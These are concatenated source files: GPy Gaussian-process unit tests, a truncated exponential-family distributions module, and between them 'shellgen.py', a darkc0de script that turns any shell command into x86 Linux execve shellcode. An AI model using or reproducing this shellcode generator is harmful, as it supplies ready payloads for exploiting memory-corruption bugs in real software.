k = kern.RBF(Q, ARD=True) + kern.White(Q, np.exp(-2)) # + kern.bias(Q)
m2 = BayesianGPLVMMiniBatch(Ymissing, Q, init="random", num_inducing=num_inducing,
kernel=k, missing_data=True)
assert(m.checkgrad())
m2.kern.rbf.lengthscale[:] = 1e6
m2.X[:] = m.X.param_array
m2.likelihood[:] = m.likelihood[:]
m2.kern.white[:] = m.kern.white[:]
mu, var = m.predict(m.X)
np.testing.assert_allclose(mul, mu)
np.testing.assert_allclose(varl, var)
q50 = m.predict_quantiles(m.X, (50,))
np.testing.assert_allclose(mul, q50[0])
def test_likelihood_replicate_kern(self):
m = GPy.models.GPRegression(self.X, self.Y)
m2 = GPy.models.GPRegression(self.X, self.Y)
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.randomize()
m2.kern[''] = m.kern[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.randomize()
m2.kern[:] = m.kern[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.randomize()
m2.kern[''] = m.kern['']
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.randomize()
m2.kern[:] = m.kern[''].values()
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
def test_big_model(self):
m = GPy.examples.dimensionality_reduction.mrd_simulation(optimize=0, plot=0, plot_sim=0)
m.X.fix()
print(m)
m.unfix()
m.checkgrad()
print(m)
m.fix()
print(m)
m.inducing_inputs.unfix()
print(m)
m.checkgrad()
m.unfix()
m.checkgrad()
m.checkgrad()
print(m)
def test_model_set_params(self):
m = GPy.models.GPRegression(self.X, self.Y)
lengthscale = np.random.uniform()
m.kern.lengthscale = lengthscale
np.testing.assert_equal(m.kern.lengthscale, lengthscale)
m.kern.lengthscale *= 1
m['.*var'] -= .1
np.testing.assert_equal(m.kern.lengthscale, lengthscale)
m.optimize()
print(m)
def test_model_updates(self):
Y1 = np.random.normal(0, 1, (40, 13))
Y2 = np.random.normal(0, 1, (40, 6))
m = GPy.models.MRD([Y1, Y2], 5)
self.count = 0
m.add_observer(self, self._count_updates, -2000)
m.update_model(False)
m['.*Gaussian'] = .001
self.assertEquals(self.count, 0)
m['.*Gaussian'].constrain_bounded(0,.01)
self.assertEquals(self.count, 0)
m.Z.fix()
self.assertEquals(self.count, 0)
m.update_model(True)
self.assertEquals(self.count, 1)
def _count_updates(self, me, which):
self.count+=1
def test_model_optimize(self):
X = np.random.uniform(-3., 3., (20, 1))
Y = np.sin(X) + np.random.randn(20, 1) * 0.05
m = GPy.models.GPRegression(X, Y)
m.optimize()
print(m)
def test_warped_gp_identity(self):
"""
A WarpedGP with the identity warping function should be
equal to a standard GP.
"""
k = GPy.kern.RBF(1)
m = GPy.models.GPRegression(self.X, self.Y, kernel=k)
m.optimize()
preds = m.predict(self.X)
warp_k = GPy.kern.RBF(1)
warp_f = GPy.util.warping_functions.IdentityFunction()
warp_m = GPy.models.WarpedGP(self.X, self.Y, kernel=warp_k, warping_function=warp_f)
warp_m.optimize()
warp_preds = warp_m.predict(self.X)
np.testing.assert_almost_equal(preds, warp_preds)
@unittest.skip('Comment this to plot the modified sine function')
def test_warped_gp_sine(self):
"""
A test replicating the sine regression problem from
Snelson's paper.
"""
X = (2 * np.pi) * np.random.random(151) - np.pi
Y = np.sin(X) + np.random.normal(0,0.1,151)
Y = np.exp(Y) - 5
#Y = np.array([np.power(abs(y),float(1)/3) * (1,-1)[y<0] for y in Y]) + 0
#np.seterr(over='raise')
import matplotlib.pyplot as plt
warp_k = GPy.kern.RBF(1)
warp_f = GPy.util.warping_functions.TanhWarpingFunction_d(n_terms=2)
warp_m = GPy.models.WarpedGP(X[:, None], Y[:, None], kernel=warp_k, warping_function=warp_f)
#warp_m['.*variance.*'].constrain_fixed(0.25)
#warp_m['.*lengthscale.*'].constrain_fixed(1)
#warp_m['warp_tanh.d'].constrain_fixed(1)
#warp_m.randomize()
#warp_m['.*warp_tanh.psi*'][:,0:2].constrain_bounded(0,100)
#warp_m['.*warp_tanh.psi*'][:,0:1].constrain_fixed(1)
#print(warp_m.checkgrad())
#warp_m.plot()
#plt.show()
warp_m.optimize_restarts(parallel=True, robust=True)
#print(warp_m.checkgrad())
print(warp_m)
print(warp_m['.*warp.*'])
warp_m.predict_in_warped_space = False
warp_m.plot()
warp_m.predict_in_warped_space = True
warp_m.plot()
warp_f.plot(X.min()-10, X.max()+10)
plt.show()
class GradientTests(np.testing.TestCase):
def setUp(self):
######################################
# # 1 dimensional example
# sample inputs and outputs
self.X1D = np.random.uniform(-3., 3., (20, 1))
self.Y1D = np.sin(self.X1D) + np.random.randn(20, 1) * 0.05
######################################
# # 2 dimensional example
# sample inputs and outputs
self.X2D = np.random.uniform(-3., 3., (40, 2))
self.Y2D = np.sin(self.X2D[:, 0:1]) * np.sin(self.X2D[:, 1:2]) + np.random.randn(40, 1) * 0.05
def check_model(self, kern, model_type='GPRegression', dimension=1, uncertain_inputs=False):
# Get the correct gradients
if dimension == 1:
X = self.X1D
Y = self.Y1D
else:
X = self.X2D
Y = self.Y2D
# Get model type (GPRegression, SparseGPRegression, etc)
model_fit = getattr(GPy.models, model_type)
# noise = GPy.kern.White(dimension)
kern = kern # + noise
if uncertain_inputs:
m = model_fit(X, Y, kernel=kern, X_variance=np.random.rand(X.shape[0], X.shape[1]))
else:
m = model_fit(X, Y, kernel=kern)
m.randomize()
        # constrain all parameters to be positive
self.assertTrue(m.checkgrad())
def test_GPRegression_rbf_1d(self):
''' Testing the GP regression with rbf kernel with white kernel on 1d data '''
rbf = GPy.kern.RBF(1)
self.check_model(rbf, model_type='GPRegression', dimension=1)
def test_GPRegression_rbf_2D(self):
''' Testing the GP regression with rbf kernel on 2d data '''
rbf = GPy.kern.RBF(2)
self.check_model(rbf, model_type='GPRegression', dimension=2)
def test_GPRegression_rbf_ARD_2D(self):
''' Testing the GP regression with rbf kernel on 2d data '''
k = GPy.kern.RBF(2, ARD=True)
self.check_model(k, model_type='GPRegression', dimension=2)
def test_GPRegression_mlp_1d(self):
''' Testing the GP regression with mlp kernel with white kernel on 1d data '''
mlp = GPy.kern.MLP(1)
self.check_model(mlp, model_type='GPRegression', dimension=1)
# TODO:
# def test_GPRegression_poly_1d(self):
# ''' Testing the GP regression with polynomial kernel with white kernel on 1d data '''
# mlp = GPy.kern.Poly(1, degree=5)
# self.check_model(mlp, model_type='GPRegression', dimension=1)
def test_GPRegression_matern52_1D(self):
''' Testing the GP regression with matern52 kernel on 1d data '''
matern52 = GPy.kern.Matern52(1)
self.check_model(matern52, model_type='GPRegression', dimension=1)
def test_GPRegression_matern52_2D(self):
''' Testing the GP regression with matern52 kernel on 2d data '''
matern52 = GPy.kern.Matern52(2)
self.check_model(matern52, model_type='GPRegression', dimension=2)
def test_GPRegression_matern52_ARD_2D(self):
''' Testing the GP regression with matern52 kernel on 2d data '''
matern52 = GPy.kern.Matern52(2, ARD=True)
self.check_model(matern52, model_type='GPRegression', dimension=2)
def test_GPRegression_matern32_1D(self):
''' Testing the GP regression with matern32 kernel on 1d data '''
matern32 = GPy.kern.Matern32(1)
self.check_model(matern32, model_type='GPRegression', dimension=1)
def test_GPRegression_matern32_2D(self):
''' Testing the GP regression with matern32 kernel on 2d data '''
matern32 = GPy.kern.Matern32(2)
self.check_model(matern32, model_type='GPRegression', dimension=2)
def test_GPRegression_matern32_ARD_2D(self):
''' Testing the GP regression with matern32 kernel on 2d data '''
matern32 = GPy.kern.Matern32(2, ARD=True)
self.check_model(matern32, model_type='GPRegression', dimension=2)
def test_GPRegression_exponential_1D(self):
''' Testing the GP regression with exponential kernel on 1d data '''
exponential = GPy.kern.Exponential(1)
self.check_model(exponential, model_type='GPRegression', dimension=1)
def test_GPRegression_exponential_2D(self):
''' Testing the GP regression with exponential kernel on 2d data '''
exponential = GPy.kern.Exponential(2)
self.check_model(exponential, model_type='GPRegression', dimension=2)
def test_GPRegression_exponential_ARD_2D(self):
''' Testing the GP regression with exponential kernel on 2d data '''
exponential = GPy.kern.Exponential(2, ARD=True)
self.check_model(exponential, model_type='GPRegression', dimension=2)
def test_GPRegression_bias_kern_1D(self):
''' Testing the GP regression with bias kernel on 1d data '''
bias = GPy.kern.Bias(1)
self.check_model(bias, model_type='GPRegression', dimension=1)
def test_GPRegression_bias_kern_2D(self):
''' Testing the GP regression with bias kernel on 2d data '''
bias = GPy.kern.Bias(2)
self.check_model(bias, model_type='GPRegression', dimension=2)
def test_GPRegression_linear_kern_1D_ARD(self):
''' Testing the GP regression with linear kernel on 1d data '''
linear = GPy.kern.Linear(1, ARD=True)
self.check_model(linear, model_type='GPRegression', dimension=1)
def test_GPRegression_linear_kern_2D_ARD(self):
''' Testing the GP regression with linear kernel on 2d data '''
linear = GPy.kern.Linear(2, ARD=True)
self.check_model(linear, model_type='GPRegression', dimension=2)
def test_GPRegression_linear_kern_1D(self):
''' Testing the GP regression with linear kernel on 1d data '''
linear = GPy.kern.Linear(1)
self.check_model(linear, model_type='GPRegression', dimension=1)
def test_GPRegression_linear_kern_2D(self):
''' Testing the GP regression with linear kernel on 2d data '''
linear = GPy.kern.Linear(2)
self.check_model(linear, model_type='GPRegression', dimension=2)
def test_SparseGPRegression_rbf_white_kern_1d(self):
''' Testing the sparse GP regression with rbf kernel with white kernel on 1d data '''
rbf = GPy.kern.RBF(1)
self.check_model(rbf, model_type='SparseGPRegression', dimension=1)
def test_SparseGPRegression_rbf_white_kern_2D(self):
''' Testing the sparse GP regression with rbf kernel on 2d data '''
rbf = GPy.kern.RBF(2)
self.check_model(rbf, model_type='SparseGPRegression', dimension=2)
def test_SparseGPRegression_rbf_linear_white_kern_1D(self):
        ''' Testing the sparse GP regression with rbf, linear and white kernels on 1d data '''
rbflin = GPy.kern.RBF(1) + GPy.kern.Linear(1) + GPy.kern.White(1, 1e-5)
self.check_model(rbflin, model_type='SparseGPRegression', dimension=1)
def test_SparseGPRegression_rbf_linear_white_kern_2D(self):
        ''' Testing the sparse GP regression with rbf and linear kernels on 2d data '''
rbflin = GPy.kern.RBF(2) + GPy.kern.Linear(2)
self.check_model(rbflin, model_type='SparseGPRegression', dimension=2)
def test_SparseGPRegression_rbf_white_kern_2D_uncertain_inputs(self):
        ''' Testing the sparse GP regression with rbf and white kernels on 2d data with uncertain inputs '''
rbflin = GPy.kern.RBF(2) + GPy.kern.White(2)
self.check_model(rbflin, model_type='SparseGPRegression', dimension=2, uncertain_inputs=1)
def test_SparseGPRegression_rbf_white_kern_1D_uncertain_inputs(self):
        ''' Testing the sparse GP regression with rbf and white kernels on 1d data with uncertain inputs '''
rbflin = GPy.kern.RBF(1) + GPy.kern.White(1)
self.check_model(rbflin, model_type='SparseGPRegression', dimension=1, uncertain_inputs=1)
def test_GPLVM_rbf_bias_white_kern_2D(self):
""" Testing GPLVM with rbf + bias kernel """
N, input_dim, D = 50, 1, 2
X = np.random.rand(N, input_dim)
k = GPy.kern.RBF(input_dim, 0.5, 0.9 * np.ones((1,))) + GPy.kern.Bias(input_dim, 0.1) + GPy.kern.White(input_dim, 0.05) + GPy.kern.Matern32(input_dim) + GPy.kern.Matern52(input_dim)
K = k.K(X)
Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T
m = GPy.models.GPLVM(Y, input_dim, kernel=k)
self.assertTrue(m.checkgrad())
def test_SparseGPLVM_rbf_bias_white_kern_2D(self):
""" Testing GPLVM with rbf + bias kernel """
N, input_dim, D = 50, 1, 2
X = np.random.rand(N, input_dim)
k = GPy.kern.RBF(input_dim, 0.5, 0.9 * np.ones((1,))) + GPy.kern.Bias(input_dim, 0.1) + GPy.kern.White(input_dim, 0.05) + GPy.kern.Matern32(input_dim) + GPy.kern.Matern52(input_dim)
K = k.K(X)
Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T
m = GPy.models.SparseGPLVM(Y, input_dim, kernel=k)
self.assertTrue(m.checkgrad())
def test_BCGPLVM_rbf_bias_white_kern_2D(self):
""" Testing GPLVM with rbf + bias kernel """
N, input_dim, D = 50, 1, 2
X = np.random.rand(N, input_dim)
k = GPy.kern.RBF(input_dim, 0.5, 0.9 * np.ones((1,))) + GPy.kern.Bias(input_dim, 0.1) + GPy.kern.White(input_dim, 0.05)
K = k.K(X)
Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T
m = GPy.models.BCGPLVM(Y, input_dim, kernel=k)
self.assertTrue(m.checkgrad())
def test_GPLVM_rbf_linear_white_kern_2D(self):
""" Testing GPLVM with rbf + bias kernel """
N, input_dim, D = 50, 1, 2
X = np.random.rand(N, input_dim)
k = GPy.kern.Linear(input_dim) + GPy.kern.Bias(input_dim, 0.1) + GPy.kern.White(input_dim, 0.05)
K = k.K(X)
Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T
m = GPy.models.GPLVM(Y, input_dim, init='PCA', kernel=k)
self.assertTrue(m.checkgrad())
def test_GP_EP_probit(self):
N = 20
        X = np.hstack([np.random.normal(5, 2, N // 2), np.random.normal(10, 2, N // 2)])[:, None]
        Y = np.hstack([np.ones(N // 2), np.zeros(N // 2)])[:, None]
kernel = GPy.kern.RBF(1)
m = GPy.models.GPClassification(X, Y, kernel=kernel)
self.assertTrue(m.checkgrad())
def test_sparse_EP_DTC_probit(self):
N = 20
        X = np.hstack([np.random.normal(5, 2, N // 2), np.random.normal(10, 2, N // 2)])[:, None]
        Y = np.hstack([np.ones(N // 2), np.zeros(N // 2)])[:, None]
Z = np.linspace(0, 15, 4)[:, None]
kernel = GPy.kern.RBF(1)
m = GPy.models.SparseGPClassification(X, Y, kernel=kernel, Z=Z)
self.assertTrue(m.checkgrad())
def test_sparse_EP_DTC_probit_uncertain_inputs(self):
N = 20
        X = np.hstack([np.random.normal(5, 2, N // 2), np.random.normal(10, 2, N // 2)])[:, None]
        Y = np.hstack([np.ones(N // 2), np.zeros(N // 2)])[:, None]
Z = np.linspace(0, 15, 4)[:, None]
X_var = np.random.uniform(0.1, 0.2, X.shape)
kernel = GPy.kern.RBF(1)
m = GPy.models.SparseGPClassificationUncertainInput(X, X_var, Y, kernel=kernel, Z=Z)
self.assertTrue(m.checkgrad())
def test_multioutput_regression_1D(self):
X1 = np.random.rand(50, 1) * 8
X2 = np.random.rand(30, 1) * 5
X = np.vstack((X1, X2))
Y1 = np.sin(X1) + np.random.randn(*X1.shape) * 0.05
Y2 = -np.sin(X2) + np.random.randn(*X2.shape) * 0.05
Y = np.vstack((Y1, Y2))
k1 = GPy.kern.RBF(1)
m = GPy.models.GPCoregionalizedRegression(X_list=[X1, X2], Y_list=[Y1, Y2], kernel=k1)
#import ipdb;ipdb.set_trace()
#m.constrain_fixed('.*rbf_var', 1.)
self.assertTrue(m.checkgrad())
def test_multioutput_sparse_regression_1D(self):
X1 = np.random.rand(500, 1) * 8
X2 = np.random.rand(300, 1) * 5
X = np.vstack((X1, X2))
Y1 = np.sin(X1) + np.random.randn(*X1.shape) * 0.05
Y2 = -np.sin(X2) + np.random.randn(*X2.shape) * 0.05
Y = np.vstack((Y1, Y2))
k1 = GPy.kern.RBF(1)
m = GPy.models.SparseGPCoregionalizedRegression(X_list=[X1, X2], Y_list=[Y1, Y2], kernel=k1)
self.assertTrue(m.checkgrad())
def test_gp_heteroscedastic_regression(self):
num_obs = 25
X = np.random.randint(0, 140, num_obs)
X = X[:, None]
Y = 25. + np.sin(X / 20.) * 2. + np.random.rand(num_obs)[:, None]
kern = GPy.kern.Bias(1) + GPy.kern.RBF(1)
m = GPy.models.GPHeteroscedasticRegression(X, Y, kern)
self.assertTrue(m.checkgrad())
def test_sparse_gp_heteroscedastic_regression(self):
num_obs = 25
X = np.random.randint(0, 140, num_obs)
X = X[:, None]
Y = 25. + np.sin(X / 20.) * 2. + np.random.rand(num_obs)[:, None]
kern = GPy.kern.Bias(1) + GPy.kern.RBF(1)
Y_metadata = {'output_index':np.arange(num_obs)[:,None]}
noise_terms = np.unique(Y_metadata['output_index'].flatten())
likelihoods_list = [GPy.likelihoods.Gaussian(name="Gaussian_noise_%s" %j) for j in noise_terms]
likelihood = GPy.likelihoods.MixedNoise(likelihoods_list=likelihoods_list)
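        # one Gaussian likelihood per output index, combined via MixedNoise so a
        # separate noise variance is learnt for each observation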
m = GPy.core.SparseGP(X, Y, X[np.random.choice(num_obs, 10)],
kern, likelihood,
inference_method=GPy.inference.latent_function_inference.VarDTC(),
Y_metadata=Y_metadata)
self.assertTrue(m.checkgrad())
def test_gp_kronecker_gaussian(self):
np.random.seed(0)
N1, N2 = 30, 20
X1 = np.random.randn(N1, 1)
X2 = np.random.randn(N2, 1)
X1.sort(0); X2.sort(0)
k1 = GPy.kern.RBF(1) # + GPy.kern.White(1)
k2 = GPy.kern.RBF(1) # + GPy.kern.White(1)
Y = np.random.randn(N1, N2)
Y = Y - Y.mean(0)
Y = Y / Y.std(0)
m = GPy.models.GPKroneckerGaussianRegression(X1, X2, Y, k1, k2)
# build the model the dumb way
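        # since K = K1 kron K2, the Kronecker model is equivalent to a standard GP
        # on the full input grid with a product kernel over the two input columns,
        # so the log likelihoods and gradients of the two models should agree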
assert (N1 * N2 < 1000), "too much data for standard GPs!"
yy, xx = np.meshgrid(X2, X1)
Xgrid = np.vstack((xx.flatten(order='F'), yy.flatten(order='F'))).T
kg = GPy.kern.RBF(1, active_dims=[0]) * GPy.kern.RBF(1, active_dims=[1])
mm = GPy.models.GPRegression(Xgrid, Y.reshape(-1, 1, order='F'), kernel=kg)
m.randomize()
mm[:] = m[:]
self.assertTrue(np.allclose(m.log_likelihood(), mm.log_likelihood()))
self.assertTrue(np.allclose(m.gradient, mm.gradient))
X1test = np.random.randn(100, 1)
X2test = np.random.randn(100, 1)
mean1, var1 = m.predict(X1test, X2test)
yy, xx = np.meshgrid(X2test, X1test)
Xgrid = np.vstack((xx.flatten(order='F'), yy.flatten(order='F'))).T
mean2, var2 = mm.predict(Xgrid)
self.assertTrue( np.allclose(mean1, mean2) )
self.assertTrue( np.allclose(var1, var2) )
def test_gp_VGPC(self):
np.random.seed(10)
num_obs = 25
X = np.random.randint(0, 140, num_obs)
X = X[:, None]
Y = 25. + np.sin(X / 20.) * 2. + np.random.rand(num_obs)[:, None]
kern = GPy.kern.Bias(1) + GPy.kern.RBF(1)
lik = GPy.likelihoods.Gaussian()
m = GPy.models.GPVariationalGaussianApproximation(X, Y, kernel=kern, likelihood=lik)
m.randomize()
self.assertTrue(m.checkgrad())
def test_ssgplvm(self):
from GPy import kern
from GPy.models import SSGPLVM
from GPy.examples.dimensionality_reduction import _simulate_matern
np.random.seed(10)
D1, D2, D3, N, num_inducing, Q = 13, 5, 8, 45, 3, 9
_, _, Ylist = _simulate_matern(D1, D2, D3, N, num_inducing, False)
Y = Ylist[0]
k = kern.Linear(Q, ARD=True) # + kern.white(Q, _np.exp(-2)) # + kern.bias(Q)
# k = kern.RBF(Q, ARD=True, lengthscale=10.)
m = SSGPLVM(Y, Q, init="rand", num_inducing=num_inducing, kernel=k, group_spike=True)
m.randomize()
self.assertTrue(m.checkgrad())
if __name__ == "__main__":
print("Running unit tests, please be (very) patient...")
unittest.main()
|
avehtari/GPy
|
GPy/testing/model_tests.py
|
Python
|
bsd-3-clause
| 32,449
|
[
"Gaussian"
] |
4ade88958a901bc853d5b63225a12cd120f2b7cd3fb5570b0cb4558638da19a8
|
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
#Greetz to all darkc0de and Zone-Hacker member
#Shoutz to d3hydr8,lowlz,p47r1ck,r45c4l,smith,dalsim,baltazar
#Original Idea took from Milw0rm (Thanks Str0ke)
import sys,os,string
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
os.system(SysCls)
print "\n|---------------------------------------------------------------|"
print "| beenudel1986[@]gmail[dot]com |"
print "| Command Execution Shell Generator(linux) |"
print "| 17/2009 shellgen.py |"
print "| Do Visit www.BeenuArora.com & darkc0de.com |"
print "| Generates Shell Code for system Commands |"
print "|---------------------------------------------------------------|\n"
if len(sys.argv) < 2:
print "\nUsage: ./shellgen.py <command>"
print "Ex: ./shellgen.py ls\n"
sys.exit(1)
command=sys.argv[1]
code ="\\x60\\x31\\xc0\\x31\\xd2\\xb0\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x68\\x2d\\x63\\x63\\x63 \\x89\\xe1\\x52\\xeb\\x07\\x51\\x53\\x89\\xe1\\xcd\\x80\\x61\\xe8\\xf4\\xff\\xff\\xff"
for payload in command:
hexshell=hex( ord(payload))
attachshell="\\"+hexshell[1:]
code+=attachshell
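# e.g. for the command 'ls': ord('l') = 0x6c and ord('s') = 0x73, so "\x6c\x73"
# is appended to the shellcode string above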
print "\n Generated Shell. \n"
print code
|
knightmare2600/d4rkc0de
|
others/shellgen.py
|
Python
|
gpl-2.0
| 2,341
|
[
"VisIt"
] |
324e1c398760a9f8382b08a0e9e6ec7a02dde6d53ac1787b22d217e9eb6bda8b
|
'''
A suite of common exponential family distributions.
'''
import numpy as np
import scipy.sparse as sps
from scipy.special import psi, polygamma, gammaln, gammasgn
from copy import deepcopy
from utils import pretty_str, safe_exp, safe_sq
import csv
def get_node(name):
if name == 'bernoulli' or name == 'b':
return Bernoulli()
if name == 'gaussian' or name == 'normal' or name == 'n':
return Gaussian()
if name == 'gamma' or name == 'g':
return Gamma()
if name.startswith('dirichlet') or name.startswith('d') or name.startswith('dir'):
num_params = int(name.replace('dirichlet', '').replace('dir', '').replace('d',''))
return Dirichlet(num_params)
if name.startswith('zi') or name.startswith('zeroinflated'):
name = name[len('zi'):] if name.startswith('zi') else name[len('zeroinflated'):]
return ZeroInflated(get_node(name))
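# e.g. get_node('dir5') builds a 5-parameter Dirichlet, and get_node('zig')
# wraps a Gamma node in a ZeroInflated node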
def get_node_from_file(target, filename):
with open(filename, 'rb') as f:
reader = csv.reader(f)
        line = next(reader)
return get_node(line[target])
def load_nodes(filename):
with open(filename, 'rb') as f:
reader = csv.reader(f)
        return [get_node(x) for x in next(reader)]
def save_nodes(nodes, filename):
with open(filename, 'wb') as f:
writer = csv.writer(f)
writer.writerow(nodes)
class ExponentialFamily:
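    # Density in natural-parameter form: p(x | eta) = h(x) * exp(eta . T(x) - A(eta)),
    # so log p = eta . T(x) + log h(x) - A(eta), which log_likelihood sums over the data.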
def log_likelihood(self, eta, x):
if sps.issparse(x):
# CSC format
y = x.multiply(eta.T).sum()
else:
y = (eta.T * x).sum()
return y + self.log_base_measure(x).sum() - self.log_partition(eta).sum()
def log_base_measure(self, x):
pass
def sufficient_statistics(self, x):
pass
def log_partition(self, eta):
pass
def grad_log_partition(self, eta):
pass
def hessian_log_partition(self, eta):
pass
def diagonal_hessian_log_partition(self, eta):
pass
def sample(self, eta, count=1):
pass
def starting_eta(self):
pass
def starting_x(self):
pass
class Bernoulli(ExponentialFamily):
def __init__(self):
self.num_params = 1
self.domain_size = 1
def sufficient_statistics(self, x):
if type(x) is not np.ndarray or len(x.shape) == 1:
return np.array([x]).T
return np.copy(x)
def log_base_measure(self, x):
return np.zeros(x.shape)
def log_partition(self, eta):
return np.log(1 + safe_exp(eta))
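    # grad A(eta) is the mean parameter: the logistic sigmoid e^eta / (1 + e^eta),
    # i.e. the Bernoulli success probability.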
def grad_log_partition(self, eta):
exp_eta = safe_exp(eta)
return exp_eta / (exp_eta + 1.0)
def hessian_log_partition(self, eta):
exp_eta = safe_exp(eta)
return -exp_eta / safe_sq(exp_eta + 1)
def diagonal_hessian_log_partition(self, eta):
return self.hessian_log_partition(eta)
def sample(self, eta, count=1):
exp_eta = safe_exp(eta)
p = exp_eta / (1 + exp_eta)
return np.random.random(size=count) < p
def eta_constraints(self, eta):
return np.array([[]])
def grad_eta_constraints(self, eta):
return np.array([[]])
def diagonal_hessian_eta_constraints(self, eta):
return np.array([[]])
def starting_x(self):
return np.zeros(1)
def __repr__(self):
return 'Bernoulli'
class Gamma(ExponentialFamily):
def __init__(self):
self.num_params = 2
self.domain_size = 1
def sufficient_statistics(self, x):
return np.array([np.log(x), x]).T
def log_base_measure(self, x):
return np.zeros(x.shape)
def log_partition(self, eta):
#assert np.all(gammasgn(eta[0]+1) == 1)
return gammaln(eta[0] + 1) - (eta[0] + 1) * np.log(-eta[1])
def grad_log_partition(self, eta):
return np.array([psi(eta[0] + 1) - np.log(-eta[1]), -(eta[0] + 1) / eta[1]])
def hessian_log_partition(self, eta):
return np.array([[polygamma(1, eta[0] + 1), -1.0 / eta[1]],
[-1.0 / eta[1], (eta[0] + 1) / safe_sq(eta[1])]])
def diagonal_hessian_log_partition(self, eta):
return np.array([polygamma(1, eta[0] + 1), (eta[0] + 1) / safe_sq(eta[1])])
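    # Natural parameters map to shape/rate via alpha = eta[0] + 1 and beta = -eta[1];
    # numpy's gamma sampler takes (shape, scale) with scale = 1/beta = -1/eta[1].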
def sample(self, eta, count=1):
return np.random.gamma(eta[0] + 1, -1.0 / eta[1], size=count)
def eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([-1 - eta[0], eta[1]])
return np.array([-1 - eta[:,0], eta[:,1]])
def grad_eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([-1., 1.])
return np.array([np.zeros(eta.shape[0]) - 1., np.ones(eta.shape[0])])
def diagonal_hessian_eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([0., 0.])
return np.array([np.zeros(eta.shape[0]), np.zeros(eta.shape[0])])
def starting_x(self):
return np.ones(1)
def __repr__(self):
return 'Gamma'
class Gaussian(ExponentialFamily):
def __init__(self):
self.num_params = 2
self.domain_size = 1
def sufficient_statistics(self, x):
return np.array([x, safe_sq(x)]).T
def log_base_measure(self, x):
return np.repeat(np.log(1./np.sqrt(2*np.pi)), x.shape[0])
def log_partition(self, eta):
return -safe_sq(eta[0]) / (4*eta[1]) - 0.5 * np.log(-2 * eta[1])
def grad_log_partition(self, eta):
return np.array([-0.5 * eta[0] / eta[1], (safe_sq(eta[0]) - 2*eta[1]) / (4 * safe_sq(eta[1]))])
def hessian_log_partition(self, eta):
return np.array([[-0.5 / eta[1],0.5 * eta[0] / safe_sq(eta[1])],
[0.5 * eta[0] / safe_sq(eta[1]),(eta[1] - safe_sq(eta[0])) / (2*eta[1]**3)]])
def diagonal_hessian_log_partition(self, eta):
return np.array([-0.5 / eta[1], (eta[1] - safe_sq(eta[0])) / (2*eta[1]**3)])
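    # Natural parameters: eta[0] = mu / sigma^2 and eta[1] = -1 / (2 sigma^2);
    # sample() inverts this mapping to recover (mu, sigma).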
def sample(self, eta, count=1):
variance = -1. / (2. * eta[1])
mu = eta[0] * variance
sigma = np.sqrt(variance)
return np.random.normal(mu, sigma, size=count)
def eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([eta[1]])
return np.array([np.zeros(0),eta[:,1]])
def grad_eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([1.])
return np.array([np.zeros(0),np.ones(eta.shape[0])])
def diagonal_hessian_eta_constraints(self, eta):
if len(eta.shape) == 1:
return np.array([0., 0.])
return np.array([np.zeros(0),np.zeros(eta.shape[0])])
def starting_x(self):
return np.zeros(1)
def __repr__(self):
return 'Gaussian'
class Dirichlet(ExponentialFamily):
def __init__(self, num_params):
self.num_params = num_params
self.domain_size = num_params
def sufficient_statistics(self, x):
if len(x.shape) == 1:
return np.array([np.log(x)])
return np.log(x)
def log_base_measure(self, x):
return np.zeros(x.shape[0])
def log_partition(self, eta):
p = eta+1
return gammaln(p).sum(axis=0) - gammaln(p.sum(axis=0))
def grad_log_partition(self, eta):
p = eta+1
return psi(p) - psi(p.sum(axis=0))
def hessian_log_partition(self, eta):
pass
def diagonal_hessian_log_partition(self, eta):
p = eta+1
return polygamma(1, p) - polygamma(1, p.sum(axis=0))
def sample(self, eta, count=1):
return np.random.dirichlet(eta+1, size=count)
def eta_constraints(self, eta):
return (-eta - 1.).T
def grad_eta_constraints(self, eta):
return np.zeros(eta.shape).T - 1.
def diagonal_hessian_eta_constraints(self, eta):
return np.zeros(eta.shape).T
def starting_x(self):
return np.ones(self.num_params) / float(self.num_params)
def __repr__(self):
return 'Dirichlet'
class ZeroInflated(ExponentialFamily):
def __init__(self, base_model):
self.base_model = base_model
self.num_params = 1 + base_model.num_params
self.domain_size = 1
# TODO: generalize to multivariate and arbitrary points that may be in the domain of the base model
def sufficient_statistics(self, x):
ss = np.zeros((x.shape[0], 3))
ss[x == 0, 0] = 1
ss[x != 0, 1:] = self.base_model.sufficient_statistics(x[x != 0])
return ss
def log_base_measure(self, x):
if sps.issparse(x):
# TODO: handle sparse data better
x = x.todense()
result = np.zeros(x.shape[0])
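        # note: np.where(...)[0][0] selects only the first row whose zero-indicator
        # is 0; every other row keeps a log base measure of 0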
idx = np.where(x[:,0]==0)[0][0]
result[idx] = self.base_model.log_base_measure(x[:,1:][idx])
return result
def log_partition(self, eta):
return np.log(safe_exp(eta[0]) + safe_exp(self.base_model.log_partition(eta[1:])))
def grad_log_partition(self, eta):
